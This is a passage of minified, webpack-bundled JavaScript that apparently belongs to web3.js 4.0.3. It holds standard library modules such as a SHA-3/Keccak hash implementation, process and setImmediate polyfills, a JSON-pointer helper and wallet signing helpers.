0f19\u0f20-\u0f29\u0f35\u0f37\u0f39\u0f3e\u0f3f\u0f71-\u0f84\u0f86\u0f87\u0f8d-\u0f97\u0f99-\u0fbc\u0fc6\u102b-\u103e\u1040-\u1049\u1056-\u1059\u105e-\u1060\u1062-\u1064\u1067-\u106d\u1071-\u1074\u1082-\u108d\u108f-\u109d\u135d-\u135f\u1712-\u1714\u1732-\u1734\u1752\u1753\u1772\u1773\u17b4-\u17d3\u17dd\u17e0-\u17e9\u180b-\u180d\u1810-\u1819\u18a9\u1920-\u192b\u1930-\u193b\u1946-\u194f\u19b0-\u19c0\u19c8\u19c9\u19d0-\u19d9\u1a17-\u1a1b\u1a55-\u1a5e\u1a60-\u1a7c\u1a7f-\u1a89\u1a90-\u1a99\u1b00-\u1b04\u1b34-\u1b44\u1b50-\u1b59\u1b6b-\u1b73\u1b80-\u1b82\u1ba1-\u1bad\u1bb0-\u1bb9\u1be6-\u1bf3\u1c24-\u1c37\u1c40-\u1c49\u1c50-\u1c59\u1cd0-\u1cd2\u1cd4-\u1ce8\u1ced\u1cf2-\u1cf4\u1dc0-\u1de6\u1dfc-\u1dff\u200c\u200d\u203f\u2040\u2054\u20d0-\u20dc\u20e1\u20e5-\u20f0\u2cef-\u2cf1\u2d7f\u2de0-\u2dff\u302a-\u302f\u3099\u309a\ua620-\ua629\ua66f\ua674-\ua67d\ua69f\ua6f0\ua6f1\ua802\ua806\ua80b\ua823-\ua827\ua880\ua881\ua8b4-\ua8c4\ua8d0-\ua8d9\ua8e0-\ua8f1\ua900-\ua909\ua926-\ua92d\ua947-\ua953\ua980-\ua983\ua9b3-\ua9c0\ua9d0-\ua9d9\uaa29-\uaa36\uaa43\uaa4c\uaa4d\uaa50-\uaa59\uaa7b\uaab0\uaab2-\uaab4\uaab7\uaab8\uaabe\uaabf\uaac1\uaaeb-\uaaef\uaaf5\uaaf6\uabe3-\uabea\uabec\uabed\uabf0-\uabf9\ufb1e\ufe00-\ufe0f\ufe20-\ufe26\ufe33\ufe34\ufe4d-\ufe4f\uff10-\uff19\uff3f]*$/.test(e);
                };
            },
            198: (e, t, r)=>{
                "use strict";
                var n = r(3243), i = r(2191), o = r(2680), s = o("Object.prototype.toString"), a = r(7226)(), u = "undefined" == typeof globalThis ? r.g : globalThis, c = i(), l = o("Array.prototype.indexOf", !0) || function(e, t) {
                    for(var r = 0; r < e.length; r += 1)if (e[r] === t) return r;
                    return -1;
                }, d = o("String.prototype.slice"), h = {}, f = r(9765), p = Object.getPrototypeOf;
                a && f && p && n(c, function(e) {
                    var t = new u[e];
                    if (Symbol.toStringTag in t) {
                        var r = p(t), n = f(r, Symbol.toStringTag);
                        if (!n) {
                            var i = p(r);
                            n = f(i, Symbol.toStringTag);
                        }
                        h[e] = n.get;
                    }
                }), e.exports = function(e) {
                    if (!e || "object" != typeof e) return !1;
                    if (!a || !(Symbol.toStringTag in e)) {
                        var t = d(s(e), 8, -1);
                        return l(c, t) > -1;
                    }
                    return !!f && function(e) {
                        var t = !1;
                        return n(h, function(r, n) {
                            if (!t) try {
                                t = r.call(e) === n;
                            } catch (e) {}
                        }), t;
                    }(e);
                };
            },
            7475: (e, t, r)=>{
                "use strict";
                r.r(t), r.d(t, {
                    default: ()=>i
                });
                var n = null;
                "undefined" != typeof WebSocket ? n = WebSocket : "undefined" != typeof MozWebSocket ? n = MozWebSocket : void 0 !== r.g ? n = r.g.WebSocket || r.g.MozWebSocket : "undefined" != typeof window ? n = window.WebSocket || window.MozWebSocket : "undefined" != typeof self && (n = self.WebSocket || self.MozWebSocket);
                const i = n;
            },
            3669: (e, t, r)=>{
                var n, i = r(4406);
                !function() {
                    "use strict";
                    var o = "input is invalid type", s = "object" == typeof window, a = s ? window : {};
                    a.JS_SHA3_NO_WINDOW && (s = !1);
                    var u = !s && "object" == typeof self;
                    !a.JS_SHA3_NO_NODE_JS && "object" == typeof i && i.versions && i.versions.node ? a = r.g : u && (a = self);
                    var c = !a.JS_SHA3_NO_COMMON_JS && e.exports, l = r.amdO, d = !a.JS_SHA3_NO_ARRAY_BUFFER && "undefined" != typeof ArrayBuffer, h = "0123456789abcdef".split(""), f = [
                        4,
                        1024,
                        262144,
                        67108864
                    ], p = [
                        0,
                        8,
                        16,
                        24
                    ], m = [
                        1,
                        0,
                        32898,
                        0,
                        32906,
                        2147483648,
                        2147516416,
                        2147483648,
                        32907,
                        0,
                        2147483649,
                        0,
                        2147516545,
                        2147483648,
                        32777,
                        2147483648,
                        138,
                        0,
                        136,
                        0,
                        2147516425,
                        0,
                        2147483658,
                        0,
                        2147516555,
                        0,
                        139,
                        2147483648,
                        32905,
                        2147483648,
                        32771,
                        2147483648,
                        32770,
                        2147483648,
                        128,
                        2147483648,
                        32778,
                        0,
                        2147483658,
                        2147483648,
                        2147516545,
                        2147483648,
                        32896,
                        2147483648,
                        2147483649,
                        0,
                        2147516424,
                        2147483648
                    ], g = [
                        224,
                        256,
                        384,
                        512
                    ], y = [
                        128,
                        256
                    ], v = [
                        "hex",
                        "buffer",
                        "arrayBuffer",
                        "array",
                        "digest"
                    ], b = {
                        128: 168,
                        256: 136
                    };
                    !a.JS_SHA3_NO_NODE_JS && Array.isArray || (Array.isArray = function(e) {
                        return "[object Array]" === Object.prototype.toString.call(e);
                    }), !d || !a.JS_SHA3_NO_ARRAY_BUFFER_IS_VIEW && ArrayBuffer.isView || (ArrayBuffer.isView = function(e) {
                        return "object" == typeof e && e.buffer && e.buffer.constructor === ArrayBuffer;
                    });
                    for(var E = function(e, t, r) {
                        return function(n) {
                            return new k(e, t, e).update(n)[r]();
                        };
                    }, A = function(e, t, r) {
                        return function(n, i) {
                            return new k(e, t, i).update(n)[r]();
                        };
                    }, _ = function(e, t, r) {
                        return function(t, n, i, o) {
                            return S["cshake" + e].update(t, n, i, o)[r]();
                        };
                    }, w = function(e, t, r) {
                        return function(t, n, i, o) {
                            return S["kmac" + e].update(t, n, i, o)[r]();
                        };
                    }, T = function(e, t, r, n) {
                        for(var i = 0; i < v.length; ++i){
                            var o = v[i];
                            e[o] = t(r, n, o);
                        }
                        return e;
                    }, R = function(e, t) {
                        var r = E(e, t, "hex");
                        return r.create = function() {
                            return new k(e, t, e);
                        }, r.update = function(e) {
                            return r.create().update(e);
                        }, T(r, E, e, t);
                    }, I = [
                        {
                            name: "keccak",
                            padding: [
                                1,
                                256,
                                65536,
                                16777216
                            ],
                            bits: g,
                            createMethod: R
                        },
                        {
                            name: "sha3",
                            padding: [
                                6,
                                1536,
                                393216,
                                100663296
                            ],
                            bits: g,
                            createMethod: R
                        },
                        {
                            name: "shake",
                            padding: [
                                31,
                                7936,
                                2031616,
                                520093696
                            ],
                            bits: y,
                            createMethod: function(e, t) {
                                var r = A(e, t, "hex");
                                return r.create = function(r) {
                                    return new k(e, t, r);
                                }, r.update = function(e, t) {
                                    return r.create(t).update(e);
                                }, T(r, A, e, t);
                            }
                        },
                        {
                            name: "cshake",
                            padding: f,
                            bits: y,
                            createMethod: function(e, t) {
                                var r = b[e], n = _(e, 0, "hex");
                                return n.create = function(n, i, o) {
                                    return i || o ? new k(e, t, n).bytepad([
                                        i,
                                        o
                                    ], r) : S["shake" + e].create(n);
                                }, n.update = function(e, t, r, i) {
                                    return n.create(t, r, i).update(e);
                                }, T(n, _, e, t);
                            }
                        },
                        {
                            name: "kmac",
                            padding: f,
                            bits: y,
                            createMethod: function(e, t) {
                                var r = b[e], n = w(e, 0, "hex");
                                return n.create = function(n, i, o) {
                                    return new L(e, t, i).bytepad([
                                        "KMAC",
                                        o
                                    ], r).bytepad([
                                        n
                                    ], r);
                                }, n.update = function(e, t, r, i) {
                                    return n.create(e, r, i).update(t);
                                }, T(n, w, e, t);
                            }
                        }
                    ], S = {}, P = [], O = 0; O < I.length; ++O)for(var x = I[O], M = x.bits, B = 0; B < M.length; ++B){
                        var N = x.name + "_" + M[B];
                        if (P.push(N), S[N] = x.createMethod(M[B], x.padding), "sha3" !== x.name) {
                            var C = x.name + M[B];
                            P.push(C), S[C] = S[N];
                        }
                    }
                    function k(e, t, r) {
                        this.blocks = [], this.s = [], this.padding = t, this.outputBits = r, this.reset = !0, this.finalized = !1, this.block = 0, this.start = 0, this.blockCount = 1600 - (e << 1) >> 5, this.byteCount = this.blockCount << 2, this.outputBlocks = r >> 5, this.extraBytes = (31 & r) >> 3;
                        for(var n = 0; n < 50; ++n)this.s[n] = 0;
                    }
                    function L(e, t, r) {
                        k.call(this, e, t, r);
                    }
                    k.prototype.update = function(e) {
                        if (this.finalized) throw new Error("finalize already called");
                        var t, r = typeof e;
                        if ("string" !== r) {
                            if ("object" !== r) throw new Error(o);
                            if (null === e) throw new Error(o);
                            if (d && e.constructor === ArrayBuffer) e = new Uint8Array(e);
                            else if (!(Array.isArray(e) || d && ArrayBuffer.isView(e))) throw new Error(o);
                            t = !0;
                        }
                        for(var n, i, s = this.blocks, a = this.byteCount, u = e.length, c = this.blockCount, l = 0, h = this.s; l < u;){
                            if (this.reset) for(this.reset = !1, s[0] = this.block, n = 1; n < c + 1; ++n)s[n] = 0;
                            if (t) for(n = this.start; l < u && n < a; ++l)s[n >> 2] |= e[l] << p[3 & n++];
                            else for(n = this.start; l < u && n < a; ++l)(i = e.charCodeAt(l)) < 128 ? s[n >> 2] |= i << p[3 & n++] : i < 2048 ? (s[n >> 2] |= (192 | i >> 6) << p[3 & n++], s[n >> 2] |= (128 | 63 & i) << p[3 & n++]) : i < 55296 || i >= 57344 ? (s[n >> 2] |= (224 | i >> 12) << p[3 & n++], s[n >> 2] |= (128 | i >> 6 & 63) << p[3 & n++], s[n >> 2] |= (128 | 63 & i) << p[3 & n++]) : (i = 65536 + ((1023 & i) << 10 | 1023 & e.charCodeAt(++l)), s[n >> 2] |= (240 | i >> 18) << p[3 & n++], s[n >> 2] |= (128 | i >> 12 & 63) << p[3 & n++], s[n >> 2] |= (128 | i >> 6 & 63) << p[3 & n++], s[n >> 2] |= (128 | 63 & i) << p[3 & n++]);
                            if (this.lastByteIndex = n, n >= a) {
                                for(this.start = n - a, this.block = s[c], n = 0; n < c; ++n)h[n] ^= s[n];
                                F(h), this.reset = !0;
                            } else this.start = n;
                        }
                        return this;
                    }, k.prototype.encode = function(e, t) {
                        var r = 255 & e, n = 1, i = [
                            r
                        ];
                        for(r = 255 & (e >>= 8); r > 0;)i.unshift(r), r = 255 & (e >>= 8), ++n;
                        return t ? i.push(n) : i.unshift(n), this.update(i), i.length;
                    }, k.prototype.encodeString = function(e) {
                        var t, r = typeof e;
                        if ("string" !== r) {
                            if ("object" !== r) throw new Error(o);
                            if (null === e) throw new Error(o);
                            if (d && e.constructor === ArrayBuffer) e = new Uint8Array(e);
                            else if (!(Array.isArray(e) || d && ArrayBuffer.isView(e))) throw new Error(o);
                            t = !0;
                        }
                        var n = 0, i = e.length;
                        if (t) n = i;
                        else for(var s = 0; s < e.length; ++s){
                            var a = e.charCodeAt(s);
                            a < 128 ? n += 1 : a < 2048 ? n += 2 : a < 55296 || a >= 57344 ? n += 3 : (a = 65536 + ((1023 & a) << 10 | 1023 & e.charCodeAt(++s)), n += 4);
                        }
                        return n += this.encode(8 * n), this.update(e), n;
                    }, k.prototype.bytepad = function(e, t) {
                        for(var r = this.encode(t), n = 0; n < e.length; ++n)r += this.encodeString(e[n]);
                        var i = t - r % t, o = [];
                        return o.length = i, this.update(o), this;
                    }, k.prototype.finalize = function() {
                        if (!this.finalized) {
                            this.finalized = !0;
                            var e = this.blocks, t = this.lastByteIndex, r = this.blockCount, n = this.s;
                            if (e[t >> 2] |= this.padding[3 & t], this.lastByteIndex === this.byteCount) for(e[0] = e[r], t = 1; t < r + 1; ++t)e[t] = 0;
                            for(e[r - 1] |= 2147483648, t = 0; t < r; ++t)n[t] ^= e[t];
                            F(n);
                        }
                    }, k.prototype.toString = k.prototype.hex = function() {
                        this.finalize();
                        for(var e, t = this.blockCount, r = this.s, n = this.outputBlocks, i = this.extraBytes, o = 0, s = 0, a = ""; s < n;){
                            for(o = 0; o < t && s < n; ++o, ++s)e = r[o], a += h[e >> 4 & 15] + h[15 & e] + h[e >> 12 & 15] + h[e >> 8 & 15] + h[e >> 20 & 15] + h[e >> 16 & 15] + h[e >> 28 & 15] + h[e >> 24 & 15];
                            s % t == 0 && (F(r), o = 0);
                        }
                        return i && (e = r[o], a += h[e >> 4 & 15] + h[15 & e], i > 1 && (a += h[e >> 12 & 15] + h[e >> 8 & 15]), i > 2 && (a += h[e >> 20 & 15] + h[e >> 16 & 15])), a;
                    }, k.prototype.arrayBuffer = function() {
                        this.finalize();
                        var e, t = this.blockCount, r = this.s, n = this.outputBlocks, i = this.extraBytes, o = 0, s = 0, a = this.outputBits >> 3;
                        e = i ? new ArrayBuffer(n + 1 << 2) : new ArrayBuffer(a);
                        for(var u = new Uint32Array(e); s < n;){
                            for(o = 0; o < t && s < n; ++o, ++s)u[s] = r[o];
                            s % t == 0 && F(r);
                        }
                        return i && (u[o] = r[o], e = e.slice(0, a)), e;
                    }, k.prototype.buffer = k.prototype.arrayBuffer, k.prototype.digest = k.prototype.array = function() {
                        this.finalize();
                        for(var e, t, r = this.blockCount, n = this.s, i = this.outputBlocks, o = this.extraBytes, s = 0, a = 0, u = []; a < i;){
                            for(s = 0; s < r && a < i; ++s, ++a)e = a << 2, t = n[s], u[e] = 255 & t, u[e + 1] = t >> 8 & 255, u[e + 2] = t >> 16 & 255, u[e + 3] = t >> 24 & 255;
                            a % r == 0 && F(n);
                        }
                        return o && (e = a << 2, t = n[s], u[e] = 255 & t, o > 1 && (u[e + 1] = t >> 8 & 255), o > 2 && (u[e + 2] = t >> 16 & 255)), u;
                    }, L.prototype = new k, L.prototype.finalize = function() {
                        return this.encode(this.outputBits, !0), k.prototype.finalize.call(this);
                    };
                    var F = function(e) {
                        var t, r, n, i, o, s, a, u, c, l, d, h, f, p, g, y, v, b, E, A, _, w, T, R, I, S, P, O, x, M, B, N, C, k, L, F, D, j, U, H, G, V, W, q, z, Q, K, J, X, Y, Z, $, ee, te, re, ne, ie, oe, se, ae, ue, ce, le;
                        for(n = 0; n < 48; n += 2)i = e[0] ^ e[10] ^ e[20] ^ e[30] ^ e[40], o = e[1] ^ e[11] ^ e[21] ^ e[31] ^ e[41], s = e[2] ^ e[12] ^ e[22] ^ e[32] ^ e[42], a = e[3] ^ e[13] ^ e[23] ^ e[33] ^ e[43], u = e[4] ^ e[14] ^ e[24] ^ e[34] ^ e[44], c = e[5] ^ e[15] ^ e[25] ^ e[35] ^ e[45], l = e[6] ^ e[16] ^ e[26] ^ e[36] ^ e[46], d = e[7] ^ e[17] ^ e[27] ^ e[37] ^ e[47], t = (h = e[8] ^ e[18] ^ e[28] ^ e[38] ^ e[48]) ^ (s << 1 | a >>> 31), r = (f = e[9] ^ e[19] ^ e[29] ^ e[39] ^ e[49]) ^ (a << 1 | s >>> 31), e[0] ^= t, e[1] ^= r, e[10] ^= t, e[11] ^= r, e[20] ^= t, e[21] ^= r, e[30] ^= t, e[31] ^= r, e[40] ^= t, e[41] ^= r, t = i ^ (u << 1 | c >>> 31), r = o ^ (c << 1 | u >>> 31), e[2] ^= t, e[3] ^= r, e[12] ^= t, e[13] ^= r, e[22] ^= t, e[23] ^= r, e[32] ^= t, e[33] ^= r, e[42] ^= t, e[43] ^= r, t = s ^ (l << 1 | d >>> 31), r = a ^ (d << 1 | l >>> 31), e[4] ^= t, e[5] ^= r, e[14] ^= t, e[15] ^= r, e[24] ^= t, e[25] ^= r, e[34] ^= t, e[35] ^= r, e[44] ^= t, e[45] ^= r, t = u ^ (h << 1 | f >>> 31), r = c ^ (f << 1 | h >>> 31), e[6] ^= t, e[7] ^= r, e[16] ^= t, e[17] ^= r, e[26] ^= t, e[27] ^= r, e[36] ^= t, e[37] ^= r, e[46] ^= t, e[47] ^= r, t = l ^ (i << 1 | o >>> 31), r = d ^ (o << 1 | i >>> 31), e[8] ^= t, e[9] ^= r, e[18] ^= t, e[19] ^= r, e[28] ^= t, e[29] ^= r, e[38] ^= t, e[39] ^= r, e[48] ^= t, e[49] ^= r, p = e[0], g = e[1], Q = e[11] << 4 | e[10] >>> 28, K = e[10] << 4 | e[11] >>> 28, O = e[20] << 3 | e[21] >>> 29, x = e[21] << 3 | e[20] >>> 29, ae = e[31] << 9 | e[30] >>> 23, ue = e[30] << 9 | e[31] >>> 23, V = e[40] << 18 | e[41] >>> 14, W = e[41] << 18 | e[40] >>> 14, k = e[2] << 1 | e[3] >>> 31, L = e[3] << 1 | e[2] >>> 31, y = e[13] << 12 | e[12] >>> 20, v = e[12] << 12 | e[13] >>> 20, J = e[22] << 10 | e[23] >>> 22, X = e[23] << 10 | e[22] >>> 22, M = e[33] << 13 | e[32] >>> 19, B = e[32] << 13 | e[33] >>> 19, ce = e[42] << 2 | e[43] >>> 30, le = e[43] << 2 | e[42] >>> 30, te = e[5] << 30 | e[4] >>> 2, re = e[4] << 30 | e[5] >>> 2, F = e[14] << 6 | e[15] >>> 26, D = e[15] << 6 | e[14] >>> 26, b = e[25] << 11 | e[24] >>> 21, E = e[24] << 11 | e[25] >>> 21, Y = e[34] << 15 | e[35] >>> 17, Z = e[35] << 15 | e[34] >>> 17, N = e[45] << 29 | e[44] >>> 3, C = e[44] << 29 | e[45] >>> 3, R = e[6] << 28 | e[7] >>> 4, I = e[7] << 28 | e[6] >>> 4, ne = e[17] << 23 | e[16] >>> 9, ie = e[16] << 23 | e[17] >>> 9, j = e[26] << 25 | e[27] >>> 7, U = e[27] << 25 | e[26] >>> 7, A = e[36] << 21 | e[37] >>> 11, _ = e[37] << 21 | e[36] >>> 11, $ = e[47] << 24 | e[46] >>> 8, ee = e[46] << 24 | e[47] >>> 8, q = e[8] << 27 | e[9] >>> 5, z = e[9] << 27 | e[8] >>> 5, S = e[18] << 20 | e[19] >>> 12, P = e[19] << 20 | e[18] >>> 12, oe = e[29] << 7 | e[28] >>> 25, se = e[28] << 7 | e[29] >>> 25, H = e[38] << 8 | e[39] >>> 24, G = e[39] << 8 | e[38] >>> 24, w = e[48] << 14 | e[49] >>> 18, T = e[49] << 14 | e[48] >>> 18, e[0] = p ^ ~y & b, e[1] = g ^ ~v & E, e[10] = R ^ ~S & O, e[11] = I ^ ~P & x, e[20] = k ^ ~F & j, e[21] = L ^ ~D & U, e[30] = q ^ ~Q & J, e[31] = z ^ ~K & X, e[40] = te ^ ~ne & oe, e[41] = re ^ ~ie & se, e[2] = y ^ ~b & A, e[3] = v ^ ~E & _, e[12] = S ^ ~O & M, e[13] = P ^ ~x & B, e[22] = F ^ ~j & H, e[23] = D ^ ~U & G, e[32] = Q ^ ~J & Y, e[33] = K ^ ~X & Z, e[42] = ne ^ ~oe & ae, e[43] = ie ^ ~se & ue, e[4] = b ^ ~A & w, e[5] = E ^ ~_ & T, e[14] = O ^ ~M & N, e[15] = x ^ ~B & C, e[24] = j ^ ~H & V, e[25] = U ^ ~G & W, e[34] = J ^ ~Y & $, e[35] = X ^ ~Z & ee, e[44] = oe ^ ~ae & ce, e[45] = se ^ ~ue & le, e[6] = A ^ ~w & p, e[7] = _ ^ ~T & g, e[16] = M ^ ~N & R, e[17] = B ^ ~C & I, e[26] = H ^ ~V & k, e[27] = G ^ ~W & L, e[36] = Y ^ ~$ & q, e[37] = Z ^ ~ee & z, e[46] = ae ^ ~ce & te, e[47] = ue ^ ~le & re, e[8] = w ^ ~p & y, e[9] = T ^ ~g & v, e[18] = N ^ ~R & S, e[19] = C ^ ~I & P, e[28] = V ^ ~k & F, e[29] = W ^ ~L & D, e[38] = $ ^ ~q & Q, e[39] = ee ^ ~z & K, e[48] = ce ^ ~te & ne, e[49] = le ^ ~re & ie, e[0] ^= m[n], e[1] ^= m[n + 1];
                    };
                    if (c) e.exports = S;
                    else {
                        for(O = 0; O < P.length; ++O)a[P[O]] = S[P[O]];
                        l && (void 0 === (n = (function() {
                            return S;
                        }).call(t, r, t, e)) || (e.exports = n));
                    }
                }();
            },
            404: (e, t)=>{
                var r = /~/, n = /~[01]/g;
                function i(e) {
                    switch(e){
                        case "~1":
                            return "/";
                        case "~0":
                            return "~";
                    }
                    throw new Error("Invalid tilde escape: " + e);
                }
                function o(e) {
                    return r.test(e) ? e.replace(n, i) : e;
                }
                function s(e) {
                    if ("string" == typeof e) {
                        if ("" === (e = e.split("/"))[0]) return e;
                        throw new Error("Invalid JSON pointer.");
                    }
                    if (Array.isArray(e)) {
                        for (const t of e)if ("string" != typeof t && "number" != typeof t) throw new Error("Invalid JSON pointer. Must be of type string or number.");
                        return e;
                    }
                    throw new Error("Invalid JSON pointer.");
                }
                function a(e, t) {
                    if ("object" != typeof e) throw new Error("Invalid input object.");
                    var r = (t = s(t)).length;
                    if (1 === r) return e;
                    for(var n = 1; n < r;){
                        if (e = e[o(t[n++])], r === n) return e;
                        if ("object" != typeof e || null === e) return;
                    }
                }
                function u(e, t, r) {
                    if ("object" != typeof e) throw new Error("Invalid input object.");
                    if (0 === (t = s(t)).length) throw new Error("Invalid JSON pointer for set.");
                    return function(e, t, r) {
                        for(var n, i, s = 1, a = t.length; s < a;){
                            if ("constructor" === t[s] || "prototype" === t[s] || "__proto__" === t[s]) return e;
                            if (n = o(t[s++]), i = a > s, void 0 === e[n] && (Array.isArray(e) && "-" === n && (n = e.length), i && ("" !== t[s] && t[s] < 1 / 0 || "-" === t[s] ? e[n] = [] : e[n] = {})), !i) break;
                            e = e[n];
                        }
                        var u = e[n];
                        return void 0 === r ? delete e[n] : e[n] = r, u;
                    }(e, t, r);
                }
                t.get = a, t.set = u, t.compile = function(e) {
                    var t = s(e);
                    return {
                        get: function(e) {
                            return a(e, t);
                        },
                        set: function(e, r) {
                            return u(e, t, r);
                        }
                    };
                };
            },
            4406: (e)=>{
                var t, r, n = e.exports = {};
                function i() {
                    throw new Error("setTimeout has not been defined");
                }
                function o() {
                    throw new Error("clearTimeout has not been defined");
                }
                function s(e) {
                    if (t === setTimeout) return setTimeout(e, 0);
                    if ((t === i || !t) && setTimeout) return t = setTimeout, setTimeout(e, 0);
                    try {
                        return t(e, 0);
                    } catch (r) {
                        try {
                            return t.call(null, e, 0);
                        } catch (r) {
                            return t.call(this, e, 0);
                        }
                    }
                }
                !function() {
                    try {
                        t = "function" == typeof setTimeout ? setTimeout : i;
                    } catch (e) {
                        t = i;
                    }
                    try {
                        r = "function" == typeof clearTimeout ? clearTimeout : o;
                    } catch (e) {
                        r = o;
                    }
                }();
                var a, u = [], c = !1, l = -1;
                function d() {
                    c && a && (c = !1, a.length ? u = a.concat(u) : l = -1, u.length && h());
                }
                function h() {
                    if (!c) {
                        var e = s(d);
                        c = !0;
                        for(var t = u.length; t;){
                            for(a = u, u = []; ++l < t;)a && a[l].run();
                            l = -1, t = u.length;
                        }
                        a = null, c = !1, function(e) {
                            if (r === clearTimeout) return clearTimeout(e);
                            if ((r === o || !r) && clearTimeout) return r = clearTimeout, clearTimeout(e);
                            try {
                                r(e);
                            } catch (t) {
                                try {
                                    return r.call(null, e);
                                } catch (t) {
                                    return r.call(this, e);
                                }
                            }
                        }(e);
                    }
                }
                function f(e, t) {
                    this.fun = e, this.array = t;
                }
                function p() {}
                n.nextTick = function(e) {
                    var t = new Array(arguments.length - 1);
                    if (arguments.length > 1) for(var r = 1; r < arguments.length; r++)t[r - 1] = arguments[r];
                    u.push(new f(e, t)), 1 !== u.length || c || s(h);
                }, f.prototype.run = function() {
                    this.fun.apply(null, this.array);
                }, n.title = "browser", n.browser = !0, n.env = {}, n.argv = [], n.version = "", n.versions = {}, n.on = p, n.addListener = p, n.once = p, n.off = p, n.removeListener = p, n.removeAllListeners = p, n.emit = p, n.prependListener = p, n.prependOnceListener = p, n.listeners = function(e) {
                    return [];
                }, n.binding = function(e) {
                    throw new Error("process.binding is not supported");
                }, n.cwd = function() {
                    return "/";
                }, n.chdir = function(e) {
                    throw new Error("process.chdir is not supported");
                }, n.umask = function() {
                    return 0;
                };
            },
            6985: function(e, t, r) {
                var n = r(4406);
                !function(e, t) {
                    "use strict";
                    if (!e.setImmediate) {
                        var r, i, o, s, a, u = 1, c = {}, l = !1, d = e.document, h = Object.getPrototypeOf && Object.getPrototypeOf(e);
                        h = h && h.setTimeout ? h : e, "[object process]" === ({}).toString.call(e.process) ? r = function(e) {
                            n.nextTick(function() {
                                p(e);
                            });
                        } : function() {
                            if (e.postMessage && !e.importScripts) {
                                var t = !0, r = e.onmessage;
                                return e.onmessage = function() {
                                    t = !1;
                                }, e.postMessage("", "*"), e.onmessage = r, t;
                            }
                        }() ? (s = "setImmediate$" + Math.random() + "$", a = function(t) {
                            t.source === e && "string" == typeof t.data && 0 === t.data.indexOf(s) && p(+t.data.slice(s.length));
                        }, e.addEventListener ? e.addEventListener("message", a, !1) : e.attachEvent("onmessage", a), r = function(t) {
                            e.postMessage(s + t, "*");
                        }) : e.MessageChannel ? ((o = new MessageChannel).port1.onmessage = function(e) {
                            p(e.data);
                        }, r = function(e) {
                            o.port2.postMessage(e);
                        }) : d && "onreadystatechange" in d.createElement("script") ? (i = d.documentElement, r = function(e) {
                            var t = d.createElement("script");
                            t.onreadystatechange = function() {
                                p(e), t.onreadystatechange = null, i.removeChild(t), t = null;
                            }, i.appendChild(t);
                        }) : r = function(e) {
                            setTimeout(p, 0, e);
                        }, h.setImmediate = function(e) {
                            "function" != typeof e && (e = new Function("" + e));
                            for(var t = new Array(arguments.length - 1), n = 0; n < t.length; n++)t[n] = arguments[n + 1];
                            var i = {
                                callback: e,
                                args: t
                            };
                            return c[u] = i, r(u), u++;
                        }, h.clearImmediate = f;
                    }
                    function f(e) {
                        delete c[e];
                    }
                    function p(e) {
                        if (l) setTimeout(p, 0, e);
                        else {
                            var t = c[e];
                            if (t) {
                                l = !0;
                                try {
                                    !function(e) {
                                        var t = e.callback, r = e.args;
                                        switch(r.length){
                                            case 0:
                                                t();
                                                break;
                                            case 1:
                                                t(r[0]);
                                                break;
                                            case 2:
                                                t(r[0], r[1]);
                                                break;
                                            case 3:
                                                t(r[0], r[1], r[2]);
                                                break;
                                            default:
                                                t.apply(void 0, r);
                                        }
                                    }(t);
                                } finally{
                                    f(e), l = !1;
                                }
                            }
                        }
                    }
                }("undefined" == typeof self ? void 0 === r.g ? this : r.g : self);
            },
            9937: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                });
                const n = r(8381);
                t.default = {
                    encodeEventSignature: n.encodeEventSignature,
                    encodeFunctionCall: n.encodeFunctionCall,
                    encodeFunctionSignature: n.encodeFunctionSignature,
                    encodeParameter: n.encodeParameter,
                    encodeParameters: n.encodeParameters,
                    decodeParameter: n.decodeParameter,
                    decodeParameters: n.decodeParameters,
                    decodeLog: n.decodeLog
                };
            },
            1186: function(e, t, r) {
                "use strict";
                var n = this && this.__awaiter || function(e, t, r, n) {
                    return new (r || (r = Promise))(function(i, o) {
                        function s(e) {
                            try {
                                u(n.next(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function a(e) {
                            try {
                                u(n.throw(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function u(e) {
                            var t;
                            e.done ? i(e.value) : (t = e.value, t instanceof r ? t : new r(function(e) {
                                e(t);
                            })).then(s, a);
                        }
                        u((n = n.apply(e, t || [])).next());
                    });
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.initAccountsForContext = void 0;
                const i = r(9970), o = r(9634), s = r(6637), a = r(9247);
                t.initAccountsForContext = (e)=>{
                    const t = (t, r)=>n(void 0, void 0, void 0, function*() {
                            const n = yield (0, s.prepareTransactionForSigning)(t, e), u = (0, o.format)({
                                format: "bytes"
                            }, r, i.ETH_DATA_FORMAT);
                            return (0, a.signTransaction)(n, u);
                        }), r = (e)=>{
                        const r = (0, a.privateKeyToAccount)(e);
                        return Object.assign(Object.assign({}, r), {
                            signTransaction: (e)=>n(void 0, void 0, void 0, function*() {
                                    return t(e, r.privateKey);
                                })
                        });
                    }, u = (e, r, i)=>n(void 0, void 0, void 0, function*() {
                            var o;
                            const s = yield (0, a.decrypt)(e, r, null === (o = null == i ? void 0 : i.nonStrict) || void 0 === o || o);
                            return Object.assign(Object.assign({}, s), {
                                signTransaction: (e)=>n(void 0, void 0, void 0, function*() {
                                        return t(e, s.privateKey);
                                    })
                            });
                        }), c = ()=>{
                        const e = (0, a.create)();
                        return Object.assign(Object.assign({}, e), {
                            signTransaction: (r)=>n(void 0, void 0, void 0, function*() {
                                    return t(r, e.privateKey);
                                })
                        });
                    }, l = new a.Wallet({
                        create: c,
                        privateKeyToAccount: r,
                        decrypt: u
                    });
                    return {
                        signTransaction: t,
                        create: c,
                        privateKeyToAccount: r,
                        decrypt: u,
                        recoverTransaction: a.recoverTransaction,
                        hashMessage: a.hashMessage,
                        sign: a.sign,
                        recover: a.recover,
                        encrypt: a.encrypt,
                        wallet: l
                    };
                };
            },
            9913: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.Web3PkgInfo = void 0, t.Web3PkgInfo = {
                    version: "4.0.3"
                };
            },
            9375: function(e, t, r) {
                "use strict";
                var n = this && this.__createBinding || (Object.create ? function(e, t, r, n) {
                    void 0 === n && (n = r);
                    var i = Object.getOwnPropertyDescriptor(t, r);
                    i && !("get" in i ? !t.__esModule : i.writable || i.configurable) || (i = {
                        enumerable: !0,
                        get: function() {
                            return t[r];
                        }
                    }), Object.defineProperty(e, n, i);
                } : function(e, t, r, n) {
                    void 0 === n && (n = r), e[n] = t[r];
                }), i = this && this.__setModuleDefault || (Object.create ? function(e, t) {
                    Object.defineProperty(e, "default", {
                        enumerable: !0,
                        value: t
                    });
                } : function(e, t) {
                    e.default = t;
